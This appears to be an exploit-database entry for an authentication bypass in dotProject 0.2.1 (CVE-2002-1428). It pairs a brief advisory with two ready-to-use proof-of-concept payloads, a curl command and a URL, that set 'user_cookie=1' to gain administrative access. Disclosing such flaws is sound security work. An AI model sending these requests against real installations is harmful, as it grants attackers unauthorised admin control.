dotProject 0.2.1 - User Cookie Authentication Bypass

Author: pokleyzz
type: webapps
platform: php
port: 
date_added: 2002-07-29  
date_updated: 2012-10-02  
verified: 1  
codes: CVE-2002-1428;OSVDB-3591  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 21661.txt  
source: https://www.securityfocus.com/bid/5347/info

dotproject is prone to an issue which may allow remote attackers to bypass authentication and gain administrative access to the software.

This may be accomplished by submitting a maliciously crafted 'user_cookie' value either manually or via manipulation of URI parameters.

This problem is due to the software relying on the user 'cookie_value' to authenticate the user.

curl -b user_cookie=1 http://server/project/index.php?m=projects

or

http://server/project/index.php?m=projects&user_cookie=1